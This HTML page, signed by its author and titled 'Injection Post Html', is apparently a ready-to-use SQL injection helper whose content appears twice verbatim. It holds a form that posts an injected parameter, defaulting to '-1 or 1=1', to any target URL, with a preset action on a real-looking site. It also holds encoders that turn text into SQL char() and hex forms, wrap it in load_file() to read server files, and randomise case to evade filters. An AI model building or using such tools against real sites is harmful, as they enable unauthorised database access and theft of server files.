<title>Injection Post Html-----孤独包子</title>
<br>
<br>
<form action=http://www.cnbct.org/jianxin method=post>
<input type=hidden name=id value=1>
</form>
<form>
<input type=text name=url value="The Post UrL" size=100>
<br>
<input type=text name=password value="id" size=10>
<br>
<input type=text name=neirong value="-1 or 1=1" size=100>
<script>
function doit()
{
document.forms[0].action=document.forms[1].url.value;
document.forms[0].id.name=document.forms[1].password.value;
document.forms[0].id.value=document.forms[1].neirong.value;
document.forms[0].submit();
}
</script>
<br>
<input type=button value=Injection onclick=doit()>
</form>
<form>
<input type=text name=input value="The input" size=100>
<br>
<input type=text name=output value="The output" size=100>
<br>
<textarea name=inputtext cols=120 rows=10 width=25>The input and output text</textarea>
<script>
function SQLchar(source) {
result = '';
for (i=0; i<source.length-1; i++){
result += "char("+source.charCodeAt(i)+"),";
}
result += "char("+source.charCodeAt(i)+")";
return result;
}
function Ascii(source) {
result = '';
for (i=0; i<source.length; i++)
result += source.charCodeAt(i);
return result;
}
function SQLhex(source) {
result = '0x';
for (i=0; i<source.length; i++)
result += source.charCodeAt(i).toString(16);
return result;
}
function md5change(source)
{
source=source.toLowerCase();
source=source.substring(8,24);
return source
}
function ranchange(source)
{
result = '';
var t;
for (i=0; i<source.length; i++)
{
if (Math.random()>0.5) {result += source.charAt(i).toUpperCase()}
else result +=source.charAt(i)
}
return result;
}
</script>
<br>
<input type=button value='SqlToChar ' onclick=document.forms[2].output.value=SQLchar(document.forms[2].input.value)>
<br>
<input type=button value='SqlToHex ' onclick=document.forms[2].output.value=SQLhex(document.forms[2].input.value)>
<br>
<input type=button value='Toloadfile ' onclick=document.forms[2].output.value="load_file("+SQLhex(document.forms[2].input.value)+")">
<br>
<input type=button value='ToAscii ' onclick=document.forms[2].output.value=Ascii(document.forms[2].input.value)>
<br>
<input type=button value='Md532To16 ' onclick=document.forms[2].output.value=md5change(document.forms[2].input.value)>
<br>
<input type=button value='Ranlow2up ' onclick=document.forms[2].inputtext.value=ranchange(document.forms[2].inputtext.value)>
<br>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center>BY 孤独包子[%5C]</center>
<br>
<br>
<form action=http://www.cnbct.org/jianxin method=post>
<input type=hidden name=id value=1>
</form>
<form>
<input type=text name=url value="The Post UrL" size=100>
<br>
<input type=text name=password value="id" size=10>
<br>
<input type=text name=neirong value="-1 or 1=1" size=100>
<script>
function doit()
{
document.forms[0].action=document.forms[1].url.value;
document.forms[0].id.name=document.forms[1].password.value;
document.forms[0].id.value=document.forms[1].neirong.value;
document.forms[0].submit();
}
</script>
<br>
<input type=button value=Injection onclick=doit()>
</form>
<form>
<input type=text name=input value="The input" size=100>
<br>
<input type=text name=output value="The output" size=100>
<br>
<textarea name=inputtext cols=120 rows=10 width=25>The input and output text</textarea>
<script>
function SQLchar(source) {
result = '';
for (i=0; i<source.length-1; i++){
result += "char("+source.charCodeAt(i)+"),";
}
result += "char("+source.charCodeAt(i)+")";
return result;
}
function Ascii(source) {
result = '';
for (i=0; i<source.length; i++)
result += source.charCodeAt(i);
return result;
}
function SQLhex(source) {
result = '0x';
for (i=0; i<source.length; i++)
result += source.charCodeAt(i).toString(16);
return result;
}
function md5change(source)
{
source=source.toLowerCase();
source=source.substring(8,24);
return source
}
function ranchange(source)
{
result = '';
var t;
for (i=0; i<source.length; i++)
{
if (Math.random()>0.5) {result += source.charAt(i).toUpperCase()}
else result +=source.charAt(i)
}
return result;
}
</script>
<br>
<input type=button value='SqlToChar ' onclick=document.forms[2].output.value=SQLchar(document.forms[2].input.value)>
<br>
<input type=button value='SqlToHex ' onclick=document.forms[2].output.value=SQLhex(document.forms[2].input.value)>
<br>
<input type=button value='Toloadfile ' onclick=document.forms[2].output.value="load_file("+SQLhex(document.forms[2].input.value)+")">
<br>
<input type=button value='ToAscii ' onclick=document.forms[2].output.value=Ascii(document.forms[2].input.value)>
<br>
<input type=button value='Md532To16 ' onclick=document.forms[2].output.value=md5change(document.forms[2].input.value)>
<br>
<input type=button value='Ranlow2up ' onclick=document.forms[2].inputtext.value=ranchange(document.forms[2].inputtext.value)>
<br>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center>BY 孤独包子[%5C]</center>
